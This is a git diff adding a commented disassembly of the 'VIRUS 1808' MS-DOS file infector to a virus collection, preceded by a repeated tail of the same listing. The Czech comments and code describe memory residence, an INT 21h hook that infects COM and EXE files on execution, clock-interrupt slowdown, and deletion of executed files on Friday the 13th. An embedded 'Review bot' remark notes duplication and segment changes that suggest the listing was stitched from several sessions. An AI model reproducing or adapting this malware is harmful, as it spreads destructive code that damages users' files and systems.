+45BD:039E 802C20 SUB Byte Ptr [SI],20
+45BD:03A1 46 INC SI
+45BD:03A2 EBEC JMP 0390
+45BD:03A4 B90B00 MOV CX,000B
+45BD:03A7 2BF1 SUB SI,CX
+45BD:03A9 BF8400 MOV DI,0084
+45BD:03AC 0E PUSH CS
+45BD:03AD 07 POP ES
+45BD:03AE B90B00 MOV CX,000B
+45BD:03B1 F3 REPZ ; VIRUS neinfikuje
+45BD:03B2 A6 CMPSB ; COMMAND.COM
+45E3:03B3 7503 JNZ 03B8
+45E3:03B5 E92F02 JMP 05E7
+45E3:03B8 B80043 MOV AX,4300 ; Zjisti atributy
+45E3:03BB CD21 INT 21 ; souboru.
+45E3:03BD 7205 JB 03C4
+45E3:03BF 2E890E7200 MOV CS:[0072],CX
+45E3:03C4 7225 JB 03EB
+45E3:03C6 32C0 XOR AL,AL
+45E3:03C8 2EA24E00 MOV CS:[004E],AL
+45E3:03CC 1E PUSH DS
+45E3:03CD 07 POP ES
+45E3:03CE 8BFA MOV DI,DX
+45E3:03D0 B94100 MOV CX,0041
+45E3:03D3 F2 REPNZ
+45E3:03D4 AE SCASB
+45E3:03D5 807DFE4D CMP Byte Ptr [DI-02],4D ; Rozeznani COM
+45E3:03D9 740B JZ 03E6 ; a EXE souboru.
+45E3:03DB 807DFE6D CMP Byte Ptr [DI-02],6D
+45E3:03DF 7405 JZ 03E6
+45E3:03E1 2EFE064E00 INC Byte Ptr CS:[004E]
+45E3:03E6 B8003D MOV AX,3D00 ; Otevri soubor.
+45E3:03E9 CD21 INT 21
+45E3:03EB 725A JB 0447
+45E3:03ED 2EA37000 MOV CS:[0070],AX
+45E3:03F1 8BD8 MOV BX,AX
+45E3:03F3 B80242 MOV AX,4202 ; Posun R/W pointer.
+45E3:03F6 B9FFFF MOV CX,FFFF ; 5 byte od konce
+45E3:03F9 BAFBFF MOV DX,FFFB ; souboru.
+45E3:03FC CD21 INT 21 ;=====================
+45E3:03FE 72EB JB 03EB
+45E3:0400 050500 ADD AX,0005
+45E3:0403 2EA31100 MOV CS:[0011],AX
+45E3:0407 B90500 MOV CX,0005
+45E3:040A BA6B00 MOV DX,006B ; Cti ze souboru
+45E3:040D 8CC8 MOV AX,CS ; 5 byte (CS:6B)
+45E3:040F 8ED8 MOV DS,AX
+45E3:0411 8EC0 MOV ES,AX
+45E3:0413 B43F MOV AH,3F
+45E3:0415 CD21 INT 21
+45E3:0417 8BFA MOV DI,DX
+45E3:0419 BE0500 MOV SI,0005 ; Rozpoznavaci kod je
+45E3:041C F3 REPZ ; MsDos.
+45E3:041D A6 CMPSB
+45E3:041E 7507 JNZ 0427
+45E3:0420 B43E MOV AH,3E ; Soubor je nakazen.
+45E3:0422 CD21 INT 21
+45E3:0424 E9C001 JMP 05E7
+45E3:0427 B82435 MOV AX,3524
+45E3:042A CD21 INT 21
+45E3:042C 891E1B00 MOV [001B],BX
+45E3:0430 8C061D00 MOV [001D],ES
+45E3:0434 BA1B02 MOV DX,021B
+45E3:0437 B82425 MOV AX,2524
+45E3:043A CD21 INT 21
+45E3:043C C5168000 LDS DX,[0080]
+45E3:0440 33C9 XOR CX,CX
+45E3:0442 B80143 MOV AX,4301
+45E3:0445 CD21 INT 21
+45E3:0447 723B JB 0484
+45E3:0449 2E8B1E7000 MOV BX,CS:[0070]
+45E3:044E B43E MOV AH,3E
+45E3:0450 CD21 INT 21
+45E3:0452 2EC7067000FFFF MOV Word Ptr CS:[0070],FFFF
+45E3:0459 B8023D MOV AX,3D02
+45E3:045C CD21 INT 21
+45E3:045E 7224 JB 0484
+45E3:0460 2EA37000 MOV CS:[0070],AX
+45E3:0464 8CC8 MOV AX,CS
+45E3:0466 8ED8 MOV DS,AX
+45E3:0468 8EC0 MOV ES,AX
+45E3:046A 8B1E7000 MOV BX,[0070]
+45E3:046E B80057 MOV AX,5700
+45E3:0471 CD21 INT 21
+45E3:0473 89167400 MOV [0074],DX
+45E3:0477 890E7600 MOV [0076],CX
+45E3:047B B80042 MOV AX,4200
+45E3:047E 33C9 XOR CX,CX
+45E3:0480 8BD1 MOV DX,CX
+45E3:0482 CD21 INT 21
+45E3:0484 723D JB 04C3
+45E3:0486 803E4E0000 CMP Byte Ptr [004E],00
+45E3:048B 7403 JZ 0490
+45E3:048D EB57 JMP 04E6
+45E3:048F 90 NOP
+45E3:0490 BB0010 MOV BX,1000
+45E3:0493 B448 MOV AH,48
+45E3:0495 CD21 INT 21
+45E3:0497 730B JNB 04A4
+45E3:0499 B43E MOV AH,3E
+45E3:049B 8B1E7000 MOV BX,[0070]
+45E3:049F CD21 INT 21
+45E3:04A1 E94301 JMP 05E7
+45E3:04A4 FF068F00 INC Word Ptr [008F]
+45E3:04A8 8EC0 MOV ES,AX
+45E3:04AA 33F6 XOR SI,SI
+45E3:04AC 8BFE MOV DI,SI
+45E3:04AE B91007 MOV CX,0710
+45E3:04B1 F3 REPZ
+45E3:04B2 A4 MOVSB
+45E3:04B3 8BD7 MOV DX,DI
+45E3:04B5 8B0E1100 MOV CX,[0011]
+45E3:04B9 8B1E7000 MOV BX,[0070]
+45E3:04BD 06 PUSH ES
+45E3:04BE 1F POP DS
+45E3:04BF B43F MOV AH,3F
+45E3:04C1 CD21 INT 21
+45E3:04C3 721C JB 04E1
+45E3:04C5 03F9 ADD DI,CX
+45E3:04C7 33C9 XOR CX,CX
+45E3:04C9 8BD1 MOV DX,CX
+45E3:04CB B80042 MOV AX,4200
+45E3:04CE CD21 INT 21
+45E3:04D0 BE0500 MOV SI,0005
+45E3:04D3 B90500 MOV CX,0005
+45E3:04D6 F3 REPZ
+45E3:04D7 2EA4 MOVSB CS:
+45E3:04D9 8BCF MOV CX,DI
+45E3:04DB 33D2 XOR DX,DX
+45E3:04DD B440 MOV AH,40
+45E3:04DF CD21 INT 21
+45E3:04E1 720D JB 04F0
+45E3:04E3 E9BC00 JMP 05A2
+45E3:04E6 B91C00 MOV CX,001C
+45E3:04E9 BA4F00 MOV DX,004F
+45E3:04EC B43F MOV AH,3F
+45E3:04EE CD21 INT 21
+45E3:04F0 724A JB 053C
+45E3:04F2 C70661008419 MOV Word Ptr [0061],1984
+45E3:04F8 A15D00 MOV AX,[005D]
+45E3:04FB A34500 MOV [0045],AX
+45E3:04FE A15F00 MOV AX,[005F]
+45E3:0501 A34300 MOV [0043],AX
+45E3:0504 A16300 MOV AX,[0063]
+45E3:0507 A34700 MOV [0047],AX
+45E3:050A A16500 MOV AX,[0065]
+45E3:050D A34900 MOV [0049],AX
+45E3:0510 A15300 MOV AX,[0053]
+45E3:0513 833E510000 CMP Word Ptr [0051],+00
+45E3:0518 7401 JZ 051B
+45E3:051A 48 DEC AX
+45E3:051B F7267800 MUL Word Ptr [0078]
+45E3:051F 03065100 ADD AX,[0051]
+45E3:0523 83D200 ADC DX,+00
+45E3:0526 050F00 ADD AX,000F
+45E3:0529 83D200 ADC DX,+00
+45E3:052C 25F0FF AND AX,FFF0
+45E3:052F A37C00 MOV [007C],AX
+45E3:0532 89167E00 MOV [007E],DX
+45E3:0536 051007 ADD AX,0710
+45E3:0539 83D200 ADC DX,+00
+45E3:053C 723A JB 0578
+45E3:053E F7367800 DIV Word Ptr [0078]
+45E3:0542 0BD2 OR DX,DX
+45E3:0544 7401 JZ 0547
+45E3:0546 40 INC AX
+45E3:0547 A35300 MOV [0053],AX
+45E3:054A 89165100 MOV [0051],DX
+45E3:054E A17C00 MOV AX,[007C]
+45E3:0551 8B167E00 MOV DX,[007E]
+45E3:0555 F7367A00 DIV Word Ptr [007A]
+45E3:0559 2B065700 SUB AX,[0057]
+45E3:055D A36500 MOV [0065],AX
+45E3:0560 C7066300C500 MOV Word Ptr [0063],00C5
+45E3:0566 A35D00 MOV [005D],AX
+45E3:0569 C7065F001007 MOV Word Ptr [005F],0710
+45E3:056F 33C9 XOR CX,CX
+45E3:0571 8BD1 MOV DX,CX
+45E3:0573 B80042 MOV AX,4200
+45E3:0576 CD21 INT 21
+45E3:0578 720A JB 0584
+45E3:057A B91C00 MOV CX,001C
+45E3:057D BA4F00 MOV DX,004F
+45E3:0580 B440 MOV AH,40
+45E3:0582 CD21 INT 21
+45E3:0584 7211 JB 0597
+45E3:0586 3BC1 CMP AX,CX
+45E3:0588 7518 JNZ 05A2
+45E3:058A 8B167C00 MOV DX,[007C]
+45E3:058E 8B0E7E00 MOV CX,[007E]
+45E3:0592 B80042 MOV AX,4200
+45E3:0595 CD21 INT 21
+45E3:0597 7209 JB 05A2
+45E3:0599 33D2 XOR DX,DX
+45E3:059B B91007 MOV CX,0710
+45E3:059E B440 MOV AH,40
+45E3:05A0 CD21 INT 21
+45E3:05A2 2E833E8F0000 CMP Word Ptr CS:[008F],+00
+45E3:05A8 7404 JZ 05AE
+45E3:05AA B449 MOV AH,49
+45E3:05AC CD21 INT 21
+45E3:05AE 2E833E7000FF CMP Word Ptr CS:[0070],-01
+45E3:05B4 7431 JZ 05E7
+45E3:05B6 2E8B1E7000 MOV BX,CS:[0070]
+45E3:05BB 2E8B167400 MOV DX,CS:[0074]
+45E3:05C0 2E8B0E7600 MOV CX,CS:[0076]
+45E3:05C5 B80157 MOV AX,5701
+45E3:05C8 CD21 INT 21
+45E3:05CA B43E MOV AH,3E
+45E3:05CC CD21 INT 21
+45E3:05CE 2EC5168000 LDS DX,CS:[0080]
+45E3:05D3 2E8B0E7200 MOV CX,CS:[0072]
+45E3:05D8 B80143 MOV AX,4301
+45E3:05DB CD21 INT 21
+45E3:05DD 2EC5161B00 LDS DX,CS:[001B]
+45E3:05E2 B82425 MOV AX,2524
+45E3:05E5 CD21 INT 21
+45E3:05E7 07 POP ES
+45E3:05E8 1F POP DS
+45E3:05E9 5F POP DI
+45E3:05EA 5E POP SI
+45E3:05EB 5A POP DX
+45E3:05EC 59 POP CX
+45E3:05ED 5B POP BX
+45E3:05EE 58 POP AX
+45E3:05EF 9D POPF
+45E3:05F0 2EFF2E1700 JMP FAR CS:[0017]
+45E3:05F0 00 00 00-00 00 00 00 00 00 00 00 ...........
+45E3:0600 F2 13 50 43 54 4F 4F 4C-53 2E 45 58 45 00 22 2F r.PCTOOLS.EXE."/
+45E3:0610 01 FE 0D 00 8B 00 F0 F0-83 F2 F4 03 00 0F 00 00 .~....pp.rt.....
+45E3:0620 4D FE 0D 04 00 45 43 3D-43 3A 5C 43 4F 4D 4D 41 M~...EC=C:\COMMA
+45E3:0630 00 47 02 00 00 32 00 FF-FF FF FF FF FF FF FF FF .G...2..........
+45E3:0640 FF FF FF FF FF FF FF FF-FF 43 3A 5C 5A 53 53 52 .........C:\ZSSR
+45E3:0650 5C 4B 41 4C 49 42 52 5C-4B 41 49 4B 49 2E 42 41 \KALIBR\KAIKI.BA
+45E3:0660 54 00 6B 61 69 6B 69 0D-00 FF FF FF 00 00 00 00 T.kaiki.........
+45E3:0670 4D FE 0D 00 10 M~...
+45E3:0670 00 00 00-00 00 00 00 00 00 00 00 ...........
+45E3:0680 E9 92 00 73 55 4D 73 44-6F 73 00 01 77 i..sUMsDos
\ No newline at end of file
diff --git a/MSDOS/Virus.MSDOS.Unknown.j_1808.lst b/MSDOS/Virus.MSDOS.Unknown.j_1808.lst
new file mode 100644
index 00000000..38366950
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.j_1808.lst
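Review bot: The new file is a DEBUG-style disassembly dump (segment:offset, raw opcode bytes, mnemonics, plus hex-dump rows such as `+0100 E9 92 00 73 55 4D ...`) rather than assemblable source, and the `.lst` twin added immediately after it carries the same blob id 38366950, so the two files are byte-identical duplicates. A one-line header stating that would stop readers from taking the `.asm` extension literally; `; NOTE: recovered DEBUG disassembly, not buildable source; identical to Virus.MSDOS.Unknown.j_1808.lst` at the top of the listing would do. The segment shown also changes from 45BD to 45E3 between offsets 03B2 and 03B3, which suggests the listing was stitched from more than one session, so the `CS:[....]` data references should not be cross-referenced as if the addresses came from a single consistent image.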
@@ -0,0 +1,583 @@
+;=======================================================================
+; VIRUS 1808
+; Virus se napojuje na preruseni 08 (hodiny) a zpomaluje chod pocitace.
+;
+;
+;
+45AD:0100 E99200 JMP 0195
+0100 E9 92 00 73 55 4D 73 44-6F 73 00 01 77 14 00 00 i..sUMsDos..w...
+0110 00 00 01 2C 02 70 00 1C-02 BC 0F EB 04 FE 0D C6 ...,.p...<.k.~.F
+0120 5D 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ]...............
+0130 00 F2 13 80 00 00 00 80-00 F2 13 5C 00 F2 13 6C .r.......r.\.r.l
+0140 00 F2 13 10 07 82 2A C5-00 82 2A 00 F0 06 00 4D .r....*E..*.p..M
+0150 5A 40 00 5D 01 00 00 20-00 2F 02 FF FF F3 2A 10 Z@.]... ./...s*.
+0160 07 84 19 C5 00 F3 2A 1E-00 00 00 00 00 00 00 00 ...E.s*.........
+0170 05 00 20 00 94 09 B0 B1-00 02 10 00 30 B1 02 00 .. ...01....01..
+
+45AD:0195 FC CLD
+45AD:0196 B4E0 MOV AH,E0 ;================================
+45AD:0198 CD21 INT 21 ; Test pritomnosti v pamati.
+45AD:019A 80FCE0 CMP AH,E0 ;
+45AD:019D 7316 JNB 01B5
+45AD:019F 80FC03 CMP AH,03
+45AD:01A2 7211 JB 01B5
+45AD:01A4 B4DD MOV AH,DD
+45AD:01A6 BF0001 MOV DI,0100
+45AD:01A9 BE1007 MOV SI,0710
+45AD:01AC 03F7 ADD SI,DI
+45AD:01AE 2E8B8D1100 MOV CX,CS:[DI+0011]
+45AD:01B3 CD21 INT 21
+45AD:01B5 8CC8 MOV AX,CS
+45AD:01B7 051000 ADD AX,0010
+45AD:01BA 8ED0 MOV SS,AX
+45AD:01BC BC0007 MOV SP,0700
+45AD:01BF 50 PUSH AX
+45AD:01C0 B8C500 MOV AX,00C5
+45AD:01C3 50 PUSH AX
+45AD:01C4 CB RETF ; Jdeme na nasledujici radek.
+;=========================================================================
+45BD:00C5 FC CLD ;
+45BD:00C6 06 PUSH ES
+45BD:00C7 2E8C063100 MOV CS:[0031],ES
+45BD:00CC 2E8C063900 MOV CS:[0039],ES
+45BD:00D1 2E8C063D00 MOV CS:[003D],ES
+45BD:00D6 2E8C064100 MOV CS:[0041],ES
+45BD:00DB 8CC0 MOV AX,ES
+45BD:00DD 051000 ADD AX,0010
+45BD:00E0 2E01064900 ADD CS:[0049],AX
+45BD:00E5 2E01064500 ADD CS:[0045],AX
+45BD:00EA B4E0 MOV AH,E0 ;=========================
+45BD:00EC CD21 INT 21 ;
+45BD:00EE 80FCE0 CMP AH,E0 ;
+45BD:00F1 7313 JNB 0106 ;=========================
+45BD:00F3 80FC03 CMP AH,03 ; VIRUS JE INSTALOVAN.
+45BD:00F6 07 POP ES
+45BD:00F7 2E8E164500 MOV SS,CS:[0045]
+45BD:00FC 2E8B264300 MOV SP,CS:[0043]
+45BD:0101 2EFF2E4700 JMP FAR CS:[0047]
+45BD:0106 33C0 XOR AX,AX ;=========================
+45BD:0108 8EC0 MOV ES,AX ; VIRUS NENI INSTALOVAN.
+45BD:010A 26A1FC03 MOV AX,ES:[03FC] ; Prerusovaci vektor 255.
+45BD:010E 2EA34B00 MOV CS:[004B],AX ; Je definovan kod
+45BD:0112 26A0FE03 MOV AL,ES:[03FE] ; 0000:03FC F3 REPZ
+45BD:0116 2EA24D00 MOV CS:[004D],AL 0000:03FD A5 MOVSW
+45BD:011A 26C706FC03F3A5 MOV Word Ptr ES:[03FC],A5F3 0000:03FE CB RETF
+45BD:0121 26C606FE03CB MOV Byte Ptr ES:[03FE],CB
+45BD:0127 58 POP AX
+45BD:0128 051000 ADD AX,0010
+45BD:012B 8EC0 MOV ES,AX
+45BD:012D 0E PUSH CS
+45BD:012E 1F POP DS
+45BD:012F B91007 MOV CX,0710
+45BD:0132 D1E9 SHR CX,1
+45BD:0134 33F6 XOR SI,SI
+45BD:0136 8BFE MOV DI,SI
+45BD:0138 06 PUSH ES
+45BD:0139 B84201 MOV AX,0142
+45BD:013C 50 PUSH AX
+45BD:013D EAFC030000 JMP 0000:03FC ;========================
+45BD:0142 8CC8 MOV AX,CS ; Po skoku pokracujeme
+45BD:0144 8ED0 MOV SS,AX ; na 45BD:142
+45BD:0146 BC0007 MOV SP,0700
+45BD:0149 33C0 XOR AX,AX ;========================
+45BD:014B 8ED8 MOV DS,AX ;
+45BD:014D 2EA14B00 MOV AX,CS:[004B] ; Obnoveni puvodni hodno-
+45BD:0151 A3FC03 MOV [03FC],AX ; ty preruseni 255.
+45BD:0154 2EA04D00 MOV AL,CS:[004D]
+45BD:0158 A2FE03 MOV [03FE],AL
+45BD:015B 8BDC MOV BX,SP ; Velikost programu v
+45BD:015D B104 MOV CL,04 ; paragrafech.
+45BD:015F D3EB SHR BX,CL
+45BD:0161 83C310 ADD BX,+10
+45BD:0164 2E891E3300 MOV CS:[0033],BX ; Zmen velikost alokovane
+45BD:0169 B44A MOV AH,4A ; pameti.
+45BD:016B 2E8E063100 MOV ES,CS:[0031] ;
+45BD:0170 CD21 INT 21 ;========================
+45BD:0172 B82135 MOV AX,3521 ; Cti preruseni 21H.
+45BD:0175 CD21 INT 21 ;
+45BD:0177 2E891E1700 MOV CS:[0017],BX ;
+45BD:017C 2E8C061900 MOV CS:[0019],ES ;========================
+45BD:0181 0E PUSH CS
+45BD:0182 1F POP DS
+45BD:0183 BA5B02 MOV DX,025B ; Definice noveho vektoru
+45BD:0186 B82125 MOV AX,2521 ; preruseni 21H.
+45BD:0189 CD21 INT 21 ;========================
+45BD:018B 8E063100 MOV ES,[0031]
+45BD:018F 268E062C00 MOV ES,ES:[002C]
+45BD:0194 33FF XOR DI,DI
+45BD:0196 B9FF7F MOV CX,7FFF
+45BD:0199 32C0 XOR AL,AL
+45BD:019B F2 REPNZ
+45BD:019C AE SCASB
+45BD:019D 263805 CMP ES:[DI],AL
+45BD:01A0 E0F9 LOOPNZ 019B
+45BD:01A2 8BD7 MOV DX,DI
+45BD:01A4 83C203 ADD DX,+03
+45BD:01A7 B8004B MOV AX,4B00
+45BD:01AA 06 PUSH ES
+45BD:01AB 1F POP DS
+45BD:01AC 0E PUSH CS
+45BD:01AD 07 POP ES
+45BD:01AE BB3500 MOV BX,0035
+45BD:01B1 1E PUSH DS
+45BD:01B2 06 PUSH ES
+45BD:01B3 50 PUSH AX
+45BD:01B4 53 PUSH BX
+45BD:01B5 51 PUSH CX
+45BD:01B6 52 PUSH DX
+45BD:01B7 B42A MOV AH,2A ; DATUM
+45BD:01B9 CD21 INT 21 ;======================
+45BD:01BB 2EC6060E0000 MOV Byte Ptr CS:[000E],00
+45BD:01C1 81F9C307 CMP CX,07C3 ; Virus se nemnozi roku
+45BD:01C5 7430 JZ 01F7 ; 1987, v patek 13 maze
+45BD:01C7 3C05 CMP AL,05 ; spustene soubory.
+45BD:01C9 750D JNZ 01D8
+45BD:01CB 80FA0D CMP DL,0D
+45BD:01CE 7508 JNZ 01D8
+45BD:01D0 2EFE060E00 INC Byte Ptr CS:[000E]
+45BD:01D5 EB20 JMP 01F7
+45BD:01D7 90 NOP
+45BD:01D8 B80835 MOV AX,3508 ;=======================
+45BD:01DB CD21 INT 21 ; Redefinice preruseni
+45BD:01DD 2E891E1300 MOV CS:[0013],BX ; 08.
+45BD:01E2 2E8C061500 MOV CS:[0015],ES
+45BD:01E7 0E PUSH CS
+45BD:01E8 1F POP DS
+45BD:01E9 C7061F00907E MOV Word Ptr [001F],7E90
+45BD:01EF B80825 MOV AX,2508
+45BD:01F2 BA1E02 MOV DX,021E ;
+45BD:01F5 CD21 INT 21 ;=======================
+45BD:01F7 5A POP DX
+45BD:01F8 59 POP CX
+45BD:01F9 5B POP BX
+45BD:01FA 58 POP AX
+45BD:01FB 07 POP ES
+45BD:01FC 1F POP DS
+45BD:01FD 9C PUSHF
+45BD:01FE 2EFF1E1700 CALL FAR CS:[0017] ; LOAD AND EXECUTE.
+45BD:0203 1E PUSH DS ;
+45BD:0204 07 POP ES
+45BD:0205 B449 MOV AH,49
+45BD:0207 CD21 INT 21
+45BD:0209 B44D MOV AH,4D
+45BD:020B CD21 INT 21
+45BD:020D B431 MOV AH,31
+45BD:020F BA0006 MOV DX,0600
+45BD:0212 B104 MOV CL,04
+45BD:0214 D3EA SHR DX,CL
+45BD:0216 83C210 ADD DX,+10
+45BD:0219 CD21 INT 21
+45BD:021B 32C0 XOR AL,AL
+45BD:021D CF IRET
+;
+;=======================================================================
+; OBSLUHA PRERUSENI 08.
+;
+45BD:021E 2E833E1F0002 CMP Word Ptr CS:[001F],+02
+45BD:0224 7517 JNZ 023D
+45BD:0226 50 PUSH AX
+45BD:0227 53 PUSH BX
+45BD:0228 51 PUSH CX
+45BD:0229 52 PUSH DX
+45BD:022A 55 PUSH BP
+45BD:022B B80206 MOV AX,0602
+45BD:022E B787 MOV BH,87
+45BD:0230 B90505 MOV CX,0505
+45BD:0233 BA1010 MOV DX,1010
+45BD:0236 CD10 INT 10
+45BD:0238 5D POP BP
+45BD:0239 5A POP DX
+45BD:023A 59 POP CX
+45BD:023B 5B POP BX
+45BD:023C 58 POP AX
+45BD:023D 2EFF0E1F00 DEC Word Ptr CS:[001F]
+45BD:0242 7512 JNZ 0256
+45BD:0244 2EC7061F000100 MOV Word Ptr CS:[001F],0001
+45BD:024B 50 PUSH AX
+45BD:024C 51 PUSH CX
+45BD:024D 56 PUSH SI
+45BD:024E B90140 MOV CX,4001
+45BD:0251 F3 REPZ
+45BD:0252 AC LODSB
+45BD:0253 5E POP SI
+45BD:0254 59 POP CX
+45BD:0255 58 POP AX
+45BD:0256 2EFF2E1300 JMP FAR CS:[0013]
+;
+;=======================================================================
+; OBSLUHA PRERUSENI 21H.
+;
+45BD:025B 9C PUSHF
+45BD:025C 80FCE0 CMP AH,E0
+45BD:025F 7505 JNZ 0266
+45BD:0261 B80003 MOV AX,0300 ; Test pritomnosti.
+45BD:0264 9D POPF ;
+45BD:0265 CF IRET ;==========================
+45BD:0266 80FCDD CMP AH,DD ;
+45BD:0269 7413 JZ 027E
+45BD:026B 80FCDE CMP AH,DE
+45BD:026E 7428 JZ 0298
+45BD:0270 3D004B CMP AX,4B00 ; LOAD AND EXECUTE.
+45BD:0273 7503 JNZ 0278
+45BD:0275 E9B400 JMP 032C
+45BD:0278 9D POPF
+45BD:0279 2EFF2E1700 JMP FAR CS:[0017] ; Puvodni obsluha.
+ ;==============================================
+45BD:027E 58 POP AX ; Obsluha kodu 0DDH.
+45BD:027F 58 POP AX
+45BD:0280 B80001 MOV AX,0100
+45BD:0283 2EA30A00 MOV CS:[000A],AX
+45BD:0287 58 POP AX
+45BD:0288 2EA30C00 MOV CS:[000C],AX
+45BD:028C F3 REPZ
+45BD:028D A4 MOVSB
+45BD:028E 9D POPF
+45BD:028F 2EA10F00 MOV AX,CS:[000F]
+45BD:0293 2EFF2E0A00 JMP FAR CS:[000A]
+ ;==============================================
+45BD:0298 83C406 ADD SP,+06 ; Obsluha kodu 0DEH.
+45BD:029B 9D POPF
+45BD:029C 8CC8 MOV AX,CS
+45BD:029E 8ED0 MOV SS,AX
+45BD:02A0 BC1007 MOV SP,0710
+45BD:02A3 06 PUSH ES
+45BD:02A4 06 PUSH ES
+45BD:02A5 33FF XOR DI,DI
+45BD:02A7 0E PUSH CS
+45BD:02A8 07 POP ES
+45BD:02A9 B91000 MOV CX,0010
+45BD:02AC 8BF3 MOV SI,BX
+45BD:02AE BF2100 MOV DI,0021
+45BD:02B1 F3 REPZ
+45BD:02B2 A4 MOVSB
+45BD:02B3 8CD8 MOV AX,DS
+45BD:02B5 8EC0 MOV ES,AX
+45BD:02B7 2EF7267A00 MUL Word Ptr CS:[007A]
+45BD:02BC 2E03062B00 ADD AX,CS:[002B]
+45BD:02C1 83D200 ADC DX,+00
+45BD:02C4 2EF7367A00 DIV Word Ptr CS:[007A]
+45BD:02C9 8ED8 MOV DS,AX
+45BD:02CB 8BF2 MOV SI,DX
+45BD:02CD 8BFA MOV DI,DX
+45BD:02CF 8CC5 MOV BP,ES
+45BD:02D1 2E8B1E2F00 MOV BX,CS:[002F]
+45BD:02D6 0BDB OR BX,BX
+45BD:02D8 7413 JZ 02ED
+45BD:02DA B90080 MOV CX,8000
+45BD:02DD F3 REPZ
+45BD:02DE A5 MOVSW
+45BD:02DF 050010 ADD AX,1000
+45BD:02E2 81C50010 ADD BP,1000
+45BD:02E6 8ED8 MOV DS,AX
+45BD:02E8 8EC5 MOV ES,BP
+45BD:02EA 4B DEC BX
+45BD:02EB 75ED JNZ 02DA
+45BD:02ED 2E8B0E2D00 MOV CX,CS:[002D]
+45BD:02F2 F3 REPZ
+45BD:02F3 A4 MOVSB
+45BD:02F4 58 POP AX
+45BD:02F5 50 PUSH AX
+45BD:02F6 051000 ADD AX,0010
+45BD:02F9 2E01062900 ADD CS:[0029],AX
+45BD:02FE 2E01062500 ADD CS:[0025],AX
+45BD:0303 2EA12100 MOV AX,CS:[0021]
+45BD:0307 1F POP DS
+45BD:0308 07 POP ES
+45BD:0309 2E8E162900 MOV SS,CS:[0029]
+45BD:030E 2E8B262700 MOV SP,CS:[0027]
+45BD:0313 2EFF2E2300 JMP FAR CS:[0023]
+ ;==============================================
+45BD:0318 33C9 XOR CX,CX ; Vymazani souboru.
+45BD:031A B80143 MOV AX,4301 ; Zmen atributy souboru.
+45BD:031D CD21 INT 21 ;
+45BD:031F B441 MOV AH,41 ; Vymaz
+45BD:0321 CD21 INT 21
+45BD:0323 B8004B MOV AX,4B00 ; a vykonej.
+45BD:0326 9D POPF
+45BD:0327 2EFF2E1700 JMP FAR CS:[0017] ; FUNGUJE v patek 13.
+ ;==============================================
+45BD:032C 2E803E0E0001 CMP Byte Ptr CS:[000E],01 ; LOAD & EXECUTE.
+45BD:0332 74E4 JZ 0318
+45BD:0334 2EC7067000FFFF MOV Word Ptr CS:[0070],FFFF
+45BD:033B 2EC7068F000000 MOV Word Ptr CS:[008F],0000
+45BD:0342 2E89168000 MOV CS:[0080],DX
+45BD:0347 2E8C1E8200 MOV CS:[0082],DS
+45BD:034C 50 PUSH AX
+45BD:034D 53 PUSH BX
+45BD:034E 51 PUSH CX
+45BD:034F 52 PUSH DX
+45BD:0350 56 PUSH SI
+45BD:0351 57 PUSH DI
+45BD:0352 1E PUSH DS
+45BD:0353 06 PUSH ES
+45BD:0354 FC CLD
+45BD:0355 8BFA MOV DI,DX
+45BD:0357 32D2 XOR DL,DL
+45BD:0359 807D013A CMP Byte Ptr [DI+01],3A
+45BD:035D 7505 JNZ 0364 ;
+45BD:035F 8A15 MOV DL,[DI] ; Volny prostor na disku.
+45BD:0361 80E21F AND DL,1F
+45BD:0364 B436 MOV AH,36
+45BD:0366 CD21 INT 21
+45BD:0368 3DFFFF CMP AX,FFFF
+45BD:036B 7503 JNZ 0370
+45BD:036D E97702 JMP 05E7 ;==========================
+45BD:0370 F7E3 MUL BX ; Vypocet volneho prostoru.
+45BD:0372 F7E1 MUL CX
+45BD:0374 0BD2 OR DX,DX
+45BD:0376 7505 JNZ 037D
+45BD:0378 3D1007 CMP AX,0710 ; Je dost mista na VIRUS?
+45BD:037B 72F0 JB 036D
+45BD:037D 2E8B168000 MOV DX,CS:[0080]
+45BD:0382 1E PUSH DS
+45BD:0383 07 POP ES
+45BD:0384 32C0 XOR AL,AL
+45BD:0386 B94100 MOV CX,0041
+45BD:0389 F2 REPNZ ; Hledani konce retezce.
+45BD:038A AE SCASB
+45BD:038B 2E8B368000 MOV SI,CS:[0080]
+45BD:0390 8A04 MOV AL,[SI]
+45BD:0392 0AC0 OR AL,AL
+45BD:0394 740E JZ 03A4
+45BD:0396 3C61 CMP AL,61
+45BD:0398 7207 JB 03A1
+45BD:039A 3C7A CMP AL,7A
+45BD:039C 7703 JA 03A1
+45BD:039E 802C20 SUB Byte Ptr [SI],20
+45BD:03A1 46 INC SI
+45BD:03A2 EBEC JMP 0390
+45BD:03A4 B90B00 MOV CX,000B
+45BD:03A7 2BF1 SUB SI,CX
+45BD:03A9 BF8400 MOV DI,0084
+45BD:03AC 0E PUSH CS
+45BD:03AD 07 POP ES
+45BD:03AE B90B00 MOV CX,000B
+45BD:03B1 F3 REPZ ; VIRUS neinfikuje
+45BD:03B2 A6 CMPSB ; COMMAND.COM
+45E3:03B3 7503 JNZ 03B8
+45E3:03B5 E92F02 JMP 05E7
+45E3:03B8 B80043 MOV AX,4300 ; Zjisti atributy
+45E3:03BB CD21 INT 21 ; souboru.
+45E3:03BD 7205 JB 03C4
+45E3:03BF 2E890E7200 MOV CS:[0072],CX
+45E3:03C4 7225 JB 03EB
+45E3:03C6 32C0 XOR AL,AL
+45E3:03C8 2EA24E00 MOV CS:[004E],AL
+45E3:03CC 1E PUSH DS
+45E3:03CD 07 POP ES
+45E3:03CE 8BFA MOV DI,DX
+45E3:03D0 B94100 MOV CX,0041
+45E3:03D3 F2 REPNZ
+45E3:03D4 AE SCASB
+45E3:03D5 807DFE4D CMP Byte Ptr [DI-02],4D ; Rozeznani COM
+45E3:03D9 740B JZ 03E6 ; a EXE souboru.
+45E3:03DB 807DFE6D CMP Byte Ptr [DI-02],6D
+45E3:03DF 7405 JZ 03E6
+45E3:03E1 2EFE064E00 INC Byte Ptr CS:[004E]
+45E3:03E6 B8003D MOV AX,3D00 ; Otevri soubor.
+45E3:03E9 CD21 INT 21
+45E3:03EB 725A JB 0447
+45E3:03ED 2EA37000 MOV CS:[0070],AX
+45E3:03F1 8BD8 MOV BX,AX
+45E3:03F3 B80242 MOV AX,4202 ; Posun R/W pointer.
+45E3:03F6 B9FFFF MOV CX,FFFF ; 5 byte od konce
+45E3:03F9 BAFBFF MOV DX,FFFB ; souboru.
+45E3:03FC CD21 INT 21 ;=====================
